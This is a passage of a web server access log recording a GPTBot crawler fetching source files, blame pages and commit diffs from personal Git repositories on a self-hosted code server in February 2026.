"https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/app/models.py" +[17/Feb/2026:13:33:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/app/fetcher.py" [Client 74.7.227.38] [Length 9938] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/app/fetcher.py" +[17/Feb/2026:13:33:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/import_csv.py" [Client 74.7.227.38] [Length 14274] [Gzip 4.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker" +[17/Feb/2026:13:33:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/init_db.py" [Client 74.7.227.38] [Length 16599] [Gzip 8.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/init_db.py" +[17/Feb/2026:13:33:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/requirements.txt" [Client 74.7.227.38] [Length 9922] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/requirements.txt" +[17/Feb/2026:13:33:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/normalizer" [Client 74.7.227.38] [Length 10427] [Gzip 3.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/normalizer" +[17/Feb/2026:13:33:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/watchfiles" [Client 74.7.227.38] [Length 10421] [Gzip 3.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/.venv/bin/watchfiles" +[17/Feb/2026:13:33:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/bf87175f515287fd25d175843915ffa6178025eb?files=asset_pilot_docker%2fstatic" [Client 74.7.227.38] [Length 49852] [Gzip 10.32] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/static" +[17/Feb/2026:13:33:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/app/fetcher.py.claude" [Client 74.7.227.38] [Length 15306] [Gzip 4.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/app" +[17/Feb/2026:13:33:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea?show-outdated=&style=split&whitespace=ignore-change" [Client 74.7.227.38] [Length 18297] [Gzip 4.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea?show-outdated=&style=unified&whitespace=ignore-change" +[17/Feb/2026:13:34:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?show-outdated=&style=split&whitespace=ignore-all" [Client 74.7.227.38] [Length 265999] [Gzip 14.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?show-outdated=&style=split&whitespace=ignore-change" +[17/Feb/2026:13:34:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/app/models.py" [Client 74.7.227.38] [Length 13341] [Gzip 4.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/app/models.py" +[17/Feb/2026:13:34:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/app/fetcher.py" [Client 74.7.227.38] [Length 16607] [Gzip 5.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/app/fetcher.py" +[17/Feb/2026:13:34:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/import_csv.py" [Client 74.7.227.38] [Length 14171] [Gzip 6.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/import_csv.py" +[17/Feb/2026:13:34:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/import_csv.py" [Client 74.7.227.38] [Length 2651] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/import_csv.py" +[17/Feb/2026:13:34:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d?show-outdated=&style=split&whitespace=ignore-change" [Client 74.7.227.38] [Length 193781] [Gzip 19.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d?show-outdated=&style=unified&whitespace=ignore-change" +[17/Feb/2026:13:34:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746?show-outdated=&style=split&whitespace=ignore-eol" [Client 74.7.227.38] [Length 17362] [Gzip 4.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746?show-outdated=&style=split&whitespace=ignore-all" +[17/Feb/2026:13:34:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6?show-outdated=&style=unified&whitespace=ignore-all" [Client 74.7.227.38] [Length 56836] [Gzip 12.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6" +[17/Feb/2026:13:34:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d?show-outdated=&style=unified&whitespace=ignore-change" [Client 74.7.227.38] [Length 15486] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d" +[17/Feb/2026:13:34:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/app/fetcher.py.claude" [Client 74.7.227.38] [Length 15546] [Gzip 9.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/app/fetcher.py.claude" +[17/Feb/2026:13:34:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/app/fetcher.py.claude" [Client 74.7.227.38] [Length 9937] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/app/fetcher.py.claude" +[17/Feb/2026:13:34:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/app/fetcher.py.claude" [Client 74.7.227.38] [Length 5547] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/app/fetcher.py.claude" +[17/Feb/2026:13:34:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/app/models.py" [Client 74.7.227.38] [Length 2169] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/app/models.py" +[17/Feb/2026:13:34:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/app/fetcher.py" [Client 74.7.227.38] [Length 4934] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/bf87175f515287fd25d175843915ffa6178025eb/asset_pilot_docker/app/fetcher.py" +[17/Feb/2026:13:34:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746?show-outdated=&style=unified&whitespace=show-all" [Client 74.7.227.38] [Length 17121] [Gzip 4.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746" +[17/Feb/2026:13:34:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e?show-outdated=&style=unified&whitespace=show-all" [Client 74.7.227.38] [Length 229663] [Gzip 12.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e" +[17/Feb/2026:13:34:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c?show-outdated=&style=split&whitespace=ignore-change" [Client 74.7.227.38] [Length 226088] [Gzip 17.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c?show-outdated=&style=unified&whitespace=ignore-change" +[17/Feb/2026:13:34:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746?show-outdated=&style=split&whitespace=ignore-change" [Client 74.7.227.38] [Length 17360] [Gzip 4.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746?show-outdated=&style=unified&whitespace=ignore-change" +[17/Feb/2026:13:34:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6?show-outdated=&style=split&whitespace=ignore-all" [Client 74.7.227.38] [Length 62007] [Gzip 15.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6?show-outdated=&style=unified&whitespace=ignore-all" +[17/Feb/2026:13:34:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d?show-outdated=&style=split&whitespace=ignore-change" [Client 74.7.227.38] [Length 15515] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d?show-outdated=&style=unified&whitespace=ignore-change" +[17/Feb/2026:13:34:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6?show-outdated=&style=split&whitespace=ignore-eol" [Client 74.7.227.38] [Length 62020] [Gzip 15.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6?show-outdated=&style=unified&whitespace=ignore-eol" +[17/Feb/2026:13:34:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6?show-outdated=&style=unified&whitespace=ignore-change" [Client 74.7.227.38] [Length 56828] [Gzip 12.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6" +[17/Feb/2026:13:34:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 153441] [Gzip 15.75] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" +[17/Feb/2026:13:34:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 10990] [Gzip 4.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" +[17/Feb/2026:13:34:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/3e4db647c22a7292965a613e62ce815b9da823a8/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 10865] [Gzip 3.78] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" +[17/Feb/2026:13:34:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/3e4db647c22a7292965a613e62ce815b9da823a8/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 151602] [Gzip 15.78] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" +[17/Feb/2026:13:34:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 71826] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80" +[17/Feb/2026:13:34:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/branches" [Client 74.7.227.38] [Length 10343] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96" +[17/Feb/2026:13:34:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/activity/yearly" [Client 74.7.227.38] [Length 8589] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/activity" +[17/Feb/2026:13:34:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6?show-outdated=&style=split&whitespace=ignore-change" [Client 74.7.227.38] [Length 61993] [Gzip 15.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6?show-outdated=&style=split&whitespace=ignore-all" +[17/Feb/2026:13:34:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/activity/weekly" [Client 74.7.227.38] [Length 8592] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/activity" +[17/Feb/2026:13:34:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/activity/weekly" [Client 74.7.227.38] [Length 8389] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/activity" +[17/Feb/2026:13:34:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/activity/yearly" [Client 74.7.227.38] [Length 8578] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/activity" +[17/Feb/2026:13:34:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 145119] [Gzip 15.78] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" +[17/Feb/2026:13:34:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 69758] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" +[17/Feb/2026:13:34:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 71796] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" +[17/Feb/2026:13:34:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr 